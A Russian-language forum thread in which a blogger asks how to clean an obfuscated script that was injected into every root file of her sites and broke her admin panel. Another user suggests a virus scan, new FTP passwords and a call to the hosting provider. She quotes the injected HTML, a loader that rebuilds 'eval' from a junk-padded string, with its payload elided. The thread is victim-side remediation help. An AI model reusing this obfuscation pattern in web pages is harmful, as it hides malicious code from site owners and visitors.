vampa
Господа, помогите разобраться с проблемой.
Обнаружилось, что не могу зайти в админку блога - пустая страница и все.
Стала смотреть код, проверять другие блоги, проверять не_только блоги - на всех доменах в корневых файлах появился скрипт, в 64битной кодировке.
Начало "
Код:
Content-Type: text/plain; charset="windows-1251"; name="file3.txt"
Content-transfer-encoding: base64
" и дальше - огромная строка символов.
Черт, никогда такое не встречала.. ч делать? Тупо перебрать все фаылй и удалить кусок кода - заново появится, на одном проверила.
Где копать?
vampa
Почти все - в 64битной колировке, человеческий вид Штирлиц показал.
Вот то что в хтмл сидит
Код:
<div id='x08d190606e1c4db62d91c48b4f6c62641'><script>var jQuery = eval('wziznMdzoAwW.YeYvYaMlz'.replace(/[zAMWY]/g, ''));
jQuery('ТУТ ООЧЕНЬ ДЛИННАЯ СТРОКА');</script></div>
один и тот же везде
vampa
Axel-B писал:
Срочно проверить комп на вирусы и поменять пароли на FTP в первую очередь. Потом вручную или скриптом проверить все файлы и вычистить всю дрянь.
уже проверяется.
сменено.
удалить из страниц - это все? дополнительных действий никаких?
Axel-B
В моем случае не понадобилось, в твоем не знаю. Посмотри, может где файлы какие подозрительные появились (скрипты). Не помешает хостеру стукнуть, чтоб они посмотрели каким образом изменялись файлы.